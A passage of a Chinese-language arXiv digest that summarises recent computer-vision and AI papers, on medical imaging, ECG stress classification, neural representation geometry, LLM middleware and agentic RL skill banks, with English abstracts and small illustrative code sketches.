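def reconstruct_clip(frames, row, fps=30):
    """按 manifest 记录从已解码视频数组 (T, H, W) 中截取并裁剪片段。"""
    t0, t1 = int(row["start_s"] * fps), int(row["end_s"] * fps)
    x, y, w, h = row["crop"]
    return frames[t0:t1, y:y + h, x:x + w]

frames = np.zeros((600, 400, 480), dtype=np.uint8)  # 合成的 600 帧 400x480 视频
clip = reconstruct_clip(frames, row)                # 形状 (120, 300, 360)
```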
[CV-314] oward Actionable Digital Twins for Radiation-Based Imaging and Therapy: Mathematical Formulation Modular Workflow and an OpenKBP-Based Dose-Surrogate Prototype
【速读】:该论文旨在解决辐射成像与治疗中数字孪生(Digital Twin)系统在临床应用中的可操作性问题,即如何通过整合患者数据、量化预测不确定性并支持受临床约束的决策来提升数字孪生的实用性。其解决方案的关键在于提出一个模块化框架,包含PatientData、Model、Solver、Calibration和Decision五大模块,并形式化了潜在状态更新、不确定性传播及机会约束下的动作选择机制;同时基于OpenKBP基准构建了一个可复现的开放数据组件,采用GPU就绪的PyTorch/MONAI实现11通道3D U-Net模型(19.2M参数),结合掩码损失训练与蒙特卡洛Dropout进行体素级认知不确定性估计,实现了包含重新校准、蒙特卡洛推理和空间优化的三分次闭环流程,平均耗时仅10.3秒,且在100名患者的测试集中达到平均剂量得分2.65 Gy和DVH得分1.82 Gy,验证了该框架在剂量预测、不确定性传播及代理闭环适应方面的有效性。
链接: https://arxiv.org/abs/2603.26820
作者: Hsin-Hsiung Huang,Bulent Soykan
机构: University of Central Florida (中佛罗里达大学)
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV); Applications (stat.AP); Computation (stat.CO)
备注:
Abstract:Digital twins for radiation-based imaging and therapy are most useful when they assimilate patient data, quantify predictive uncertainty, and support clinically constrained decisions. This paper presents a modular framework for actionable digital twins in radiation-based imaging and therapy and instantiates its reproducible open-data component using the Open Knowledge-Based Planning (OpenKBP) benchmark. The framework couples PatientData, Model, Solver, Calibration, and Decision modules and formalizes latent-state updating, uncertainty propagation, and chance-constrained action selection. As an initial implementation, we build a GPU-ready PyTorch/MONAI reimplementation of the OpenKBP starter pipeline: an 11-channel, 19.2M-parameter 3D U-Net trained with a masked loss over the feasible region and equipped with Monte Carlo dropout for voxel-wise epistemic uncertainty. To emulate the update loop on a static benchmark, we introduce decoder-only proxy recalibration and illustrate uncertainty-aware virtual-therapy evaluation using DVH-based and biological utilities. A complete three-fraction loop including recalibration, Monte Carlo inference, and spatial optimization executes in 10.3 s. On the 100-patient test set, the model achieved mean dose and DVH scores of 2.65 and 1.82 Gy, respectively, with 0.58 s mean inference time per patient. The OpenKBP case study thus serves as a reproducible test bed for dose prediction, uncertainty propagation, and proxy closed-loop adaptation, while future institutional studies will address longitudinal calibration with delivered-dose logs and repeat imaging.
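摘要提到基于 DVH(剂量体积直方图)的评估效用。累计 DVH 即"结构内接受剂量 ≥ d 的体素占比",最小示意如下(剂量刻度与数值均为假设,与 OpenKBP 的真实数据无关):

```python
import numpy as np

def cumulative_dvh(dose, mask, levels):
    """结构 mask 内,接受剂量 >= 各 level(Gy)的体素比例(累计 DVH)。"""
    d = dose[mask]
    return np.array([(d >= lv).mean() for lv in levels])

dose = np.array([0.0, 10.0, 20.0, 30.0])  # 假想的 4 个体素剂量(Gy)
mask = np.array([True, True, True, True])  # 结构掩膜:此处取全部体素
print(cumulative_dvh(dose, mask, [0.0, 15.0, 25.0]))  # → 比例 1.0、0.5、0.25
```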
[CV-315] Dictionary-based Pathology Mining with Hard-instance-assisted Classifier Debiasing for Genetic Biomarker Prediction from WSIs
【速读】:该论文旨在解决病理图像中遗传生物标志物(如结直肠癌中的微卫星不稳定性,Microsatellite Instability, MSI)预测的两个关键挑战:一是难以构建包含复杂病理组分间交互关系的病理感知表征;二是全切片图像(Whole Slide Images, WSI)中存在大量与生物标志物无关的区域,导致模型易过拟合无关实例。解决方案的核心在于提出一种基于字典的分层病理挖掘与硬实例辅助分类器去偏框架(Dictionary-based hierarchical pathology mining with hard-instance-assisted classifier debiasing, D2Bio)。其关键创新包括:第一,通过字典驱动的分层病理挖掘模块,无需限制patch间距即可捕获多样且细粒度的病理上下文交互;第二,引入硬实例辅助的分类器去偏模块,在无额外标注的情况下聚焦于难样本但任务相关的特征,从而学习到更鲁棒、去偏的分类器。实验表明,该方法在多个队列上显著优于现有方法,尤其在TCGA-CRC-MSI队列中AUROC提升超过4%,并展现出良好的临床可解释性与生存分析潜力。
链接: https://arxiv.org/abs/2603.26809
作者: Ling Zhang,Boxiang Yun,Ting Jin,Qingli Li,Xinxing Li,Yan Wang
机构: Shanghai Key Laboratory of Multidimensional Information Processing, East China Normal University, Shanghai, China (上海多维信息处理重点实验室,华东师范大学,中国上海); Department of General Surgery, Tongji Hospital, Tongji University School of Medicine, Shanghai 200065, China (同济医院普外科,同济大学医学院,中国上海)
类目: Quantitative Methods (q-bio.QM); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 13 pages, 13 figures
Abstract:Prediction of genetic biomarkers, e.g., microsatellite instability in colorectal cancer is crucial for clinical decision making. But, two primary challenges hamper accurate prediction: (1) It is difficult to construct a pathology-aware representation involving the complex interconnections among pathological components. (2) WSIs contain a large proportion of areas unrelated to genetic biomarkers, which make the model easily overfit simple but irrelative instances. We hereby propose a Dictionary-based hierarchical pathology mining with hard-instance-assisted classifier Debiasing framework to address these challenges, dubbed as D2Bio. Our first module, dictionary-based hierarchical pathology mining, is able to mine diverse and very fine-grained pathological contextual interaction without the limit to the distances between patches. The second module, hard-instance-assisted classfier debiasing, learns a debiased classifier via focusing on hard but task-related features, without any additional annotations. Experimental results on five cohorts show the superiority of our method, with over 4% improvement in AUROC compared with the second best on the TCGA-CRC-MSI cohort. Our analysis further shows the clinical interpretability of D2Bio in genetic biomarker diagnosis and potential clinical utility in survival analysis. Code will be available at this https URL.
[CV-316] Beyond Benchmarks: A Framework for Post Deployment Validation of CT Lung Nodule Detection AI
【速读】:该论文旨在解决生成式 AI (Generative AI) 辅助肺结节检测模型在临床部署后,因CT扫描参数(如剂量和层厚)系统性变化导致性能不可预测的问题。解决方案的关键在于提出并验证了一个基于物理机制的评估框架,通过模拟不同剂量减少(25%、50%)和层厚变化(3 mm、5 mm)条件下的图像特征,定量分析模型敏感性;结果表明,层厚变化对检测性能的影响远大于噪声干扰,尤其5 mm层厚导致灵敏度下降达42%,凸显其作为关键约束因素的重要性。该框架无需专有设备数据,具备可复现性,适用于资源受限环境中的持续后部署质量保证(QA)。
链接: https://arxiv.org/abs/2603.26785
作者: Daniel Soliman
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Background: Artificial intelligence (AI) assisted lung nodule detection systems are increasingly deployed in clinical settings without site-specific validation. Performance reported under benchmark conditions may not reflect real-world behavior when acquisition parameters differ from training data. Purpose: To propose and demonstrate a physics-guided framework for evaluating the sensitivity of a deployed lung nodule detection model to systematic variation in CT acquisition parameters. Methods: Twenty-one cases from the publicly available LIDC-IDRI dataset were evaluated using a MONAI RetinaNet model pretrained on LUNA16 (fold 0, no fine-tuning). Five imaging conditions were tested: baseline, 25% dose reduction, 50% dose reduction, 3 mm slice thickness, and 5 mm slice thickness. Dose reduction was simulated via image-domain Gaussian noise; slice thickness via moving average along the z-axis. Detection sensitivity was computed at a confidence threshold of 0.5 with a 15 mm matching criterion. Results: Baseline sensitivity was 45.2% (57/126 consensus nodules). Dose reduction produced slight degradation: 41.3% at 25% dose and 42.1% at 50% dose. The 5 mm slice thickness condition produced a marked drop to 26.2% - a 19 percentage point reduction representing a 42% relative decrease from baseline. This finding was consistent across confidence thresholds from 0.1 to 0.9. Per-case analysis revealed heterogeneous performance including two cases with complete detection failure at baseline. Conclusion: Slice thickness represents a more fundamental constraint on AI detection performance than image noise under the conditions tested. The proposed framework is reproducible, requires no proprietary scanner data, and is designed to serve as the basis for ongoing post-deployment QA in resource-constrained environments.
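摘要明确了两种退化模拟:图像域高斯噪声模拟降剂量、沿 z 轴滑动平均模拟厚层。下面是对应的最小 NumPy 示意(噪声基线 `sigma0` 与量子噪声随剂量的缩放关系为常见假设,并非论文给出的参数):

```python
import numpy as np

def simulate_dose_reduction(volume, dose_fraction, sigma0=25.0, seed=0):
    """图像域噪声注入:量子噪声方差约与剂量成反比,
    因此附加噪声的标准差随剂量比例下降而增大(sigma0 为假设的 HU 基线)。"""
    rng = np.random.default_rng(seed)
    extra_sigma = sigma0 * np.sqrt(1.0 / dose_fraction - 1.0)
    return volume + rng.normal(0.0, extra_sigma, volume.shape)

def simulate_slice_thickness(volume, factor):
    """沿 z 轴(axis 0)做长度为 factor 的滑动平均,模拟更厚的层厚。"""
    kernel = np.ones(factor) / factor
    return np.apply_along_axis(lambda z: np.convolve(z, kernel, mode="same"),
                               0, volume)

vol = np.zeros((10, 4, 4)); vol[5] = 100.0   # 单个高亮切片
thick = simulate_slice_thickness(vol, 3)      # 能量被摊到相邻切片上
noisy = simulate_dose_reduction(vol, 0.5)     # 50% 剂量 ⇒ 附加噪声 sigma=25
```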
[CV-317] Stress Classification from ECG Signals Using Vision Transformer
【速读】:该论文旨在解决基于生理信号(如心电图 ECG)进行多层级压力评估的问题,尤其针对跨被试差异(intersubject variability)带来的挑战。传统卷积神经网络(CNN)模型在处理此类数据时受限于手工特征设计及对个体差异的敏感性,难以实现高鲁棒性和泛化能力。解决方案的关键在于将原始 ECG 信号通过短时傅里叶变换(STFT)转换为二维频谱图(2D spectrograms),并将其以图像块(patches)形式输入视觉 Transformer(Vision Transformer)编码器,利用其自注意力机制捕捉全局依赖关系,从而有效建模跨被试间的变异特性。实验表明,该方法无需人工特征工程、端到端训练,且在 WESAD 和 RML 数据集上分别实现了 76.7% 和 71.01% 的三分类准确率以及 88.3% 的二分类准确率,显著优于现有最先进方法。
链接: https://arxiv.org/abs/2603.26721
作者: Zeeshan Ahmad,Naimul Khan
机构: 未知
类目: ignal Processing (eess.SP); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 10 pages
Abstract:Vision Transformers have shown tremendous success in numerous computer vision applications; however, they have not been exploited for stress assessment using physiological signals such as Electrocardiogram (ECG). In order to get the maximum benefit from the vision transformer for multilevel stress assessment, in this paper, we transform the raw ECG data into 2D spectrograms using the short-time Fourier transform (STFT). These spectrograms are divided into patches for feeding to the transformer encoder. We also perform experiments with 1D CNN and ResNet-18 (CNN model). We perform leave-one-subject-out cross-validation (LOSOCV) experiments on the WESAD and Ryerson Multimedia Lab (RML) datasets. One of the biggest challenges of LOSOCV-based experiments is to tackle the problem of intersubject variability. In this research, we address the issue of intersubject variability and show our success using 2D spectrograms and the attention mechanism of transformer. Experiments show that vision transformer handles the effect of intersubject variability much better than CNN-based models and beats all previous state-of-the-art methods by a considerable margin. Moreover, our method is end-to-end, does not require handcrafted features, and can learn robust representations. The proposed method achieved 71.01% and 76.7% accuracies on the RML and WESAD datasets, respectively, for three-class classification, and 88.3% for binary classification on WESAD.
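"原始 ECG → STFT 频谱图 → 切块送入 Transformer 编码器"这一流水线可用纯 NumPy 做最小示意如下(窗长、步长、patch 大小及采样率均为演示假设,并非论文超参数):

```python
import numpy as np

def ecg_spectrogram(ecg, n_fft=64, hop=32):
    """一维 ECG 信号 → 对数幅度 STFT 频谱图,输出形状为 (频率, 时间)。"""
    window = np.hanning(n_fft)
    n_frames = 1 + (len(ecg) - n_fft) // hop
    frames = np.stack([ecg[i * hop: i * hop + n_fft] * window
                       for i in range(n_frames)])
    return np.log1p(np.abs(np.fft.rfft(frames, axis=1))).T

def to_patches(spec, patch=8):
    """将 2D 频谱图切为不重叠 patch 并展平,即 ViT 编码器的输入 token 序列。"""
    f, t = (spec.shape[0] // patch) * patch, (spec.shape[1] // patch) * patch
    s = spec[:f, :t]
    return (s.reshape(f // patch, patch, t // patch, patch)
             .transpose(0, 2, 1, 3)
             .reshape(-1, patch * patch))

fs = 250                                              # 假设采样率 250 Hz
ecg = np.sin(2 * np.pi * 1.2 * np.arange(3000) / fs)  # 约 72 BPM 的替代信号
tokens = to_patches(ecg_spectrogram(ecg))             # 每行是一个 8x8 patch
```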
[CV-318] EMPD: An Event-based Multimodal Physiological Dataset for Remote Pulse Wave Detection
【速读】:该论文旨在解决传统基于帧式相机的远程光电容积脉搏波描记术(remote photoplethysmography, rPPG)在运动伪影和有限时间分辨率方面的局限性。其解决方案的关键在于构建首个专为事件相机(event camera)设计的多模态生理数据集EMP D(Event-based Multimodal Physiological Dataset),通过激光辅助采集系统将桡动脉皮肤微振动调制为可被类脑传感器检测的显著信号,结合高分辨率事件相机、工业级RGB相机与临床级血氧仪,实现微秒级时间精度的多模态同步数据采集,从而为类脑生理监测算法的鲁棒性开发提供关键基准资源。
链接: https://arxiv.org/abs/2603.26699
作者: Qian Feng,Pengfei Li,Rongshan Gao,Jiale Xu,Rui Gong,Yidi Li
机构: Taiyuan University of Technology (太原理工大学)
类目: ignal Processing (eess.SP); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 12 pages, 4 figures, 2 tables
Abstract:Remote photoplethysmography (rPPG) based on traditional frame-based cameras often struggles with motion artifacts and limited temporal resolution. To address these limitations, we introduce EMPD (Event-based Multimodal Physiological Dataset), the first benchmark dataset specifically designed for non-contact physiological sensing via event cameras. The dataset leverages a laser-assisted acquisition system where a high-coherence laser modulates subtle skin vibrations from the radial artery into significant signals detectable by a neuromorphic sensor. The hardware platform integrates a high-resolution event camera to capture micro-motions and intensity transients, an industrial RGB camera to provide traditional rPPG benchmarks, and a clinical-grade pulse oximeter to record ground truth PPG waveforms. EMPD contains 193 valid records collected from 83 subjects, covering a wide heart rate range (40-110 BPM) under both resting and post-exercise conditions. By providing precisely synchronized multimodal data with microsecond-level temporal precision, EMPD serves as a crucial resource for developing robust algorithms in the field of neuromorphic physiological monitoring. The dataset is publicly available at: this https URL
人工智能
[AI-0] Geometry-aware similarity metrics for neural representations on Riemannian and statistical manifolds
【速读】:该论文旨在解决现有相似性度量方法在分析神经网络表征几何结构时的局限性问题,即传统方法仅比较状态空间中的外蕴几何(extrinsic geometry),难以捕捉不同神经网络解决方案之间的细微但关键差异。其解决方案的关键在于提出一种基于黎曼几何(Riemannian geometry)的新方法——度量相似性分析(Metric Similarity Analysis, MSA),该方法在流形假设(manifold hypothesis)下比较神经表征的内蕴几何(intrinsic geometry),从而更准确地揭示深度网络中不同学习机制、非线性动力学以及扩散模型等场景下的计算特征。
链接: https://arxiv.org/abs/2603.28764
作者: N Alex Cayco Gajic,Arthur Pellegrino
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Differential Geometry (math.DG); Neurons and Cognition (q-bio.NC)
备注:
Abstract:Similarity measures are widely used to interpret the representational geometries used by neural networks to solve tasks. Yet, because existing methods compare the extrinsic geometry of representations in state space, rather than their intrinsic geometry, they may fail to capture subtle yet crucial distinctions between fundamentally different neural network solutions. Here, we introduce metric similarity analysis (MSA), a novel method which leverages tools from Riemannian geometry to compare the intrinsic geometry of neural representations under the manifold hypothesis. We show that MSA can be used to i) disentangle features of neural computations in deep networks with different learning regimes, ii) compare nonlinear dynamics, and iii) investigate diffusion models. Hence, we introduce a mathematically grounded and broadly applicable framework to understand the mechanisms behind neural computations by comparing their intrinsic geometries.
[AI-1] RAD-AI: Rethinking Architecture Documentation for AI-Augmented Ecosystems
【速读】:该论文旨在解决当前主流软件架构文档框架(如arc42和C4模型)无法有效描述AI增强型生态系统(AI-augmented ecosystems)中特有的不确定性行为、数据依赖演化以及机器学习(Machine Learning, ML)与软件双生命周期等复杂特性的问题,这导致在欧盟《人工智能法案》(EU AI Act)附件IV所要求的技术文档合规性方面存在显著缺口。解决方案的关键在于提出RAD-AI,一个向后兼容的扩展框架:一方面在arc42中新增八个AI特定章节,另一方面在C4模型中引入三个图表扩展,并辅以系统性的附件IV合规映射机制,从而显著提升对高风险AI系统的结构化文档支持能力,实证表明其将合规内容覆盖率从约36%提升至93%。
链接: https://arxiv.org/abs/2603.28735
作者: Oliver Aleksander Larsen,Mahyar T. Moghaddam
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at ANGE 2026, co-located with IEEE ICSA 2026. 8 pages
Abstract:AI-augmented ecosystems (interconnected systems where multiple AI components interact through shared data and infrastructure) are becoming the architectural norm for smart cities, autonomous fleets, and intelligent platforms. Yet the architecture documentation frameworks practitioners rely on, arc42 and the C4 model, were designed for deterministic software and cannot capture probabilistic behavior, data-dependent evolution, or dual ML/software lifecycles. This gap carries regulatory consequence: the EU AI Act (Regulation 2024/1689) mandates technical documentation through Annex IV that no existing framework provides structured support for, with enforcement for high-risk systems beginning August 2, 2026. We present RAD-AI, a backward-compatible extension framework that augments arc42 with eight AI-specific sections and C4 with three diagram extensions, complemented by a systematic EU AI Act Annex IV compliance mapping. A regulatory coverage assessment with six experienced software-architecture practitioners provides preliminary evidence that RAD-AI increases Annex IV addressability from approximately 36% to 93% (mean rating) and demonstrates substantial improvement over existing frameworks. Comparative analysis on two production AI platforms (Uber Michelangelo, Netflix Metaflow) captures eight additional AI-specific concerns missed by standard frameworks and demonstrates that documentation deficiencies are structural rather than domain-specific. An illustrative smart mobility ecosystem case study reveals ecosystem-level concerns, including cascading drift and differentiated compliance obligations, that are invisible under standard notation.
[AI-2] SAGAI-MID: A Generative AI-Driven Middleware for Dynamic Runtime Interoperability
【速读】:该论文旨在解决现代分布式系统中因服务异构性导致的持久性模式不匹配问题,例如不同版本的REST API、GraphQL端点以及具有专有数据格式的物联网(IoT)设备之间的交互障碍。传统静态适配器需手动编码每对模式组合,无法在运行时处理新出现的组合。其解决方案的关键在于提出SAGAI-MID——一个基于FastAPI的中间件,利用大语言模型(Large Language Models, LLMs)动态检测并解析运行时模式不匹配。该系统采用五层流水线架构:混合检测(结构差异与LLM语义分析结合)、双策略分辨率(按请求进行LLM转换和生成可复用的适配器代码),以及三层保障机制(验证、集成投票、规则回退)。通过将Bass等人提出的互操作性战术从设计阶段转化为运行时能力,实现了高效、灵活且可扩展的跨协议与多版本服务集成。
链接: https://arxiv.org/abs/2603.28731
作者: Oliver Aleksander Larsen,Mahyar T. Moghaddam
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at SAGAI 2026, co-located with IEEE ICSA 2026. 8 pages
Abstract:Modern distributed systems integrate heterogeneous services, REST APIs with different schema versions, GraphQL endpoints, and IoT devices with proprietary payloads that suffer from persistent schema mismatches. Traditional static adapters require manual coding for every schema pair and cannot handle novel combinations at runtime. We present SAGAI-MID, a FastAPI-based middleware that uses large language models (LLMs) to dynamically detect and resolve schema mismatches at runtime. The system employs a five-layer pipeline: hybrid detection (structural diff plus LLM semantic analysis), dual resolution strategies (per-request LLM transformation and LLM-generated reusable adapter code), and a three-tier safeguard stack (validation, ensemble voting, rule-based fallback). We frame the architecture through Bass et al.'s interoperability tactics, transforming them from design-time artifacts into runtime capabilities. We evaluate SAGAI-MID on 10 interoperability scenarios spanning REST version migration, IoT-to-analytics bridging, and GraphQL protocol conversion across six LLMs from two providers. The best-performing configuration achieves 0.90 pass@1 accuracy. The CODEGEN strategy consistently outperforms DIRECT (0.83 vs 0.77 mean pass@1), while cost varies by over 30x across models with no proportional accuracy gain; the most accurate model is also the cheapest. We discuss implications for software architects adopting LLMs as runtime architectural components.
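摘要中混合检测(hybrid detection)的"结构差异"部分可用如下草图示意:先比较两个 JSON 负载的键集合与字段类型,非空差异再交给 LLM 做语义分析与转换。字段名与示例数据为虚构,仅作说明,并非该中间件的真实接口。

```python
# Sketch of the "structural diff" half of SAGAI-MID's hybrid detection layer:
# compare key sets and value types of two JSON payloads before any LLM
# semantic analysis. Field names below are invented for illustration.

def schema_of(payload: dict) -> dict:
    """Map each top-level field to the name of its Python type."""
    return {k: type(v).__name__ for k, v in payload.items()}

def structural_diff(src: dict, dst: dict) -> dict:
    s, d = schema_of(src), schema_of(dst)
    return {
        "missing_in_dst": sorted(set(s) - set(d)),
        "extra_in_dst": sorted(set(d) - set(s)),
        "type_mismatch": sorted(k for k in set(s) & set(d) if s[k] != d[k]),
    }

# Two hypothetical API versions of the same sensor reading
v1 = {"id": 7, "temp_c": 21.5, "ts": "2026-03-30T12:00:00Z"}
v2 = {"id": "7", "temperature": 21.5, "ts": "2026-03-30T12:00:00Z"}
diff = structural_diff(v1, v2)
print(diff)
# a non-empty diff would trigger LLM transformation or adapter generation
```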
[AI-3] Dynamic Dual-Granularity Skill Bank for Agentic RL
【速读】:该论文旨在解决**代理强化学习(Agentic Reinforcement Learning, Agentic RL)**中 reusable experience 利用效率低的问题,尤其是现有基于技能(skill-based)的方法通常仅提取轨迹级指导,缺乏对技能记忆的动态维护机制。解决方案的关键在于提出 D2Skill——一种动态双粒度技能库(Dynamic Dual-Granularity Skill Bank),将可复用经验组织为任务技能(task skills,用于高层引导)和步骤技能(step skills,用于细粒度决策支持与错误修正)。其核心创新在于通过同一策略下配对的基线回放与技能注入回放之间的性能差距,生成事后效用信号(hindsight utility signals),用于联合优化策略与技能库;同时,技能库完全基于训练时经验构建,通过反思机制持续扩展,并结合效用感知检索与剪枝维持高效性。实验表明,该方法在 ALFWorld 和 WebShop 基于 Qwen 大语言模型的环境中显著提升成功率(相比无技能基线提高 10–20 点),且双粒度建模与动态维护机制均对性能提升至关重要。
链接: https://arxiv.org/abs/2603.28716
作者: Songjun Tu,Chengdong Xu,Qichao Zhang,Yaocheng Zhang,Xiangyuan Lan,Linjing Li,Dongbin Zhao
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 12 pages
Abstract:Agentic reinforcement learning (RL) can benefit substantially from reusable experience, yet existing skill-based methods mainly extract trajectory-level guidance and often lack principled mechanisms for maintaining an evolving skill memory. We propose D2Skill, a dynamic dual-granularity skill bank for agentic RL that organizes reusable experience into task skills for high-level guidance and step skills for fine-grained decision support and error correction. D2Skill jointly trains the policy and skill bank through paired baseline and skill-injected rollouts under the same policy, using their performance gap to derive hindsight utility signals for both skill updating and policy optimization. Built entirely from training-time experience, the skill bank is continuously expanded through reflection and maintained with utility-aware retrieval and pruning. Experiments on ALFWorld and WebShop with Qwen2.5-7B-Instruct and Qwen3-4B-Instruct-2507 show that D2Skill consistently improves success rates over skill-free baselines by 10-20 points. Further ablations and analyses show that both dual-granularity skill modeling and dynamic skill maintenance are critical to these gains, while the learned skills exhibit higher utility, transfer across evaluation settings, and introduce only modest training overhead.
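摘要中"配对基线回放与技能注入回放、用性能差距产生事后效用信号"的思路可用下面的草图说明。字段名与简单的成功率差分均为笔者假设,并非论文的原始公式;低效用技能随后会被从技能库中剪枝。

```python
from dataclasses import dataclass

# Illustrative sketch only: D2Skill derives hindsight utility signals from
# paired baseline vs. skill-injected rollouts under the same policy; the
# success-rate difference below is our simplified stand-in.

@dataclass
class RolloutPair:
    baseline_success: bool   # rollout without the skill injected
    injected_success: bool   # rollout with the skill in context

def skill_utility(pairs: list) -> float:
    """Utility of a skill = success-rate gap of injected vs. baseline rollouts."""
    if not pairs:
        return 0.0
    gain = sum(p.injected_success for p in pairs) / len(pairs)
    base = sum(p.baseline_success for p in pairs) / len(pairs)
    return gain - base

# A skill that flips two failures into successes earns positive utility
pairs = [RolloutPair(False, True), RolloutPair(False, True), RolloutPair(True, True)]
u = skill_utility(pairs)
print(u)
```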
[AI-4] A Convex Route to Thermomechanics: Learning Internal Energy and Dissipation
【速读】:该论文旨在解决在完全耦合热力学力学(fully coupled thermomechanics)中发现本构模型的问题,传统方法通常基于亥姆霍兹自由能(Helmholtz energy),需满足混合凸-凹条件(mixed convexity–concavity conditions),这在实际建模中存在约束困难。其解决方案的关键在于采用内能(internal energy)和耗散势(dissipation potential)作为基本本构函数,并以变形和熵为变量进行表达,从而避免对混合凸性条件的强制约束,同时确保热力学一致性。通过使用输入凸神经网络(input convex neural networks)实现内能与耗散势的参数化,保证了第二定律的遵守;并通过不变量表示和零锚定结构将客观性(objectivity)、材料对称性和归一化直接嵌入网络架构,最终在合成数据和实验数据(包括软组织与填充橡胶的热力耦合响应)上验证了所提框架在无须熵数据情况下仍能准确学习并保持热力学可接受性的能力。
链接: https://arxiv.org/abs/2603.28707
作者: Hagen Holthusen,Paul Steinmann,Ellen Kuhl
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 31 pages, 16 figures, 4 tables
Abstract:We present a physics-based neural network framework for the discovery of constitutive models in fully coupled thermomechanics. In contrast to classical formulations based on the Helmholtz energy, we adopt the internal energy and a dissipation potential as primary constitutive functions, expressed in terms of deformation and entropy. This choice avoids the need to enforce mixed convexity–concavity conditions and facilitates a consistent incorporation of thermodynamic principles. In this contribution, we focus on materials without preferred directions or internal variables. While the formulation is posed in terms of entropy, the temperature is treated as the independent observable, and the entropy is inferred internally through the constitutive relation, enabling thermodynamically consistent modeling without requiring entropy data. Thermodynamic admissibility of the networks is guaranteed by construction. The internal energy and dissipation potential are represented by input convex neural networks, ensuring convexity and compliance with the second law. Objectivity, material symmetry, and normalization are embedded directly into the architecture through invariant-based representations and zero-anchored formulations. We demonstrate the performance of the proposed framework on synthetic and experimental datasets, including purely thermal problems and fully coupled thermomechanical responses of soft tissues and filled rubbers. The results show that the learned models accurately capture the underlying constitutive behavior. All code, data, and trained models are made publicly available via this https URL. 
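摘要中的输入凸神经网络(input convex neural network, ICNN)可以用如下极简 NumPy 草图说明:z 路径上的权重取非负、激活函数取凸且单调不减的 softplus,即可保证网络输出对输入凸。层宽等超参数为示意假设,并非论文配置。

```python
import numpy as np

# Minimal input convex neural network (ICNN) sketch in NumPy. The paper
# represents internal energy and dissipation potential with ICNNs; layer
# sizes and the softplus activation here are illustrative assumptions.

rng = np.random.default_rng(0)

def softplus(x):  # convex, non-decreasing activation preserves convexity
    return np.logaddexp(0.0, x)

class ICNN:
    def __init__(self, dim_in, hidden=(16, 16)):
        dims = (0,) + hidden + (1,)
        self.Wx = [rng.normal(size=(dims[i + 1], dim_in)) * 0.3
                   for i in range(len(dims) - 1)]
        # Non-negative z-path weights are what guarantee convexity in x
        self.Wz = [np.abs(rng.normal(size=(dims[i + 1], dims[i]))) * 0.3
                   for i in range(1, len(dims) - 1)]
        self.b = [np.zeros(dims[i + 1]) for i in range(len(dims) - 1)]

    def __call__(self, x):
        z = softplus(self.Wx[0] @ x + self.b[0])
        for Wz, Wx, b in zip(self.Wz[:-1], self.Wx[1:-1], self.b[1:-1]):
            z = softplus(Wz @ z + Wx @ x + b)
        return (self.Wz[-1] @ z + self.Wx[-1] @ x + self.b[-1]).item()

net = ICNN(dim_in=2)
a, c = np.array([0.0, 0.0]), np.array([1.0, 1.0])
mid = net(0.5 * a + 0.5 * c)
chord = 0.5 * net(a) + 0.5 * net(c)
print(mid <= chord + 1e-9)  # convexity: midpoint lies under the chord
```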
[AI-5] AMIGO: Agentic Multi-Image Grounding Oracle Benchmark
【速读】:该论文旨在解决当前对智能体视觉语言模型(Agentic Vision-Language Models)的评估仍局限于单图像、单轮正确性,而忽视其在长程交互中通过多轮问答逐步定位目标的能力问题。为应对这一挑战,作者提出了AMIGO(Agentic Multi-Image Grounding Oracle Benchmark),其核心创新在于设计了一个基于隐藏目标识别的多图像场景基准测试:模型需通过一系列聚焦属性的“是/否/不确定”问题,在严格协议下(违规动作被标记为Skip)从视觉相似图像集中逐步缩小范围以识别目标图像。该方案的关键在于引入了三个关键评估维度——不确定性下的问题选择能力、跨轮次的一致约束追踪能力,以及随证据累积实现细粒度判别的能力,并支持可控的oracle噪声设置以探测模型在不一致反馈下的鲁棒性和验证行为,从而更全面地衡量模型在复杂交互任务中的表现。
链接: https://arxiv.org/abs/2603.28662
作者: Min Wang,Ata Mahjoubfar
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Agentic vision-language models increasingly act through extended interactions, but most evaluations still focus on single-image, single-turn correctness. We introduce AMIGO (Agentic Multi-Image Grounding Oracle Benchmark), a long-horizon benchmark for hidden-target identification over galleries of visually similar images. In AMIGO, the oracle privately selects a target image, and the model must recover it by asking a sequence of attribute-focused Yes/No/Unsure questions under a strict protocol that penalizes invalid actions with Skip. This setting stresses (i) question selection under uncertainty, (ii) consistent constraint tracking across turns, and (iii) fine-grained discrimination as evidence accumulates. AMIGO also supports controlled oracle imperfections to probe robustness and verification behavior under inconsistent feedback. We instantiate AMIGO with Guess My Preferred Dress task and report metrics covering both outcomes and interaction quality, including identification success, evidence verification, efficiency, protocol compliance, noise tolerance, and trajectory-level diagnostics.
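AMIGO 式的隐藏目标识别交互可用如下玩具示例说明:智能体通过属性"是/否"问题逐步缩小候选集,直至唯一确定目标。这里把每张"图像"简化为二值属性向量,并用贪心的均匀二分来选题;编码方式与选题策略均为笔者假设,基准本身使用真实图像。

```python
# Toy sketch of an AMIGO-style interaction loop: narrow a gallery of
# candidates to the oracle's hidden target via Yes/No attribute questions.
# The bit-vector encoding and greedy question choice are our assumptions.

def best_question(candidates, n_attrs):
    """Greedy: pick the attribute that splits the candidate set most evenly."""
    return min(range(n_attrs),
               key=lambda a: abs(sum(c[a] for c in candidates) - len(candidates) / 2))

def identify(gallery, target):
    candidates = list(gallery)
    turns = 0
    while len(candidates) > 1:
        q = best_question(candidates, len(target))
        answer = target[q]                       # oracle answers truthfully
        candidates = [c for c in candidates if c[q] == answer]
        turns += 1
    return candidates[0], turns

# 8 "images", each described by 3 binary attributes (e.g. sleeve, color, length)
gallery = [(a, b, c) for a in (0, 1) for b in (0, 1) for c in (0, 1)]
found, turns = identify(gallery, target=(1, 0, 1))
print(found, turns)  # target recovered in 3 questions
```

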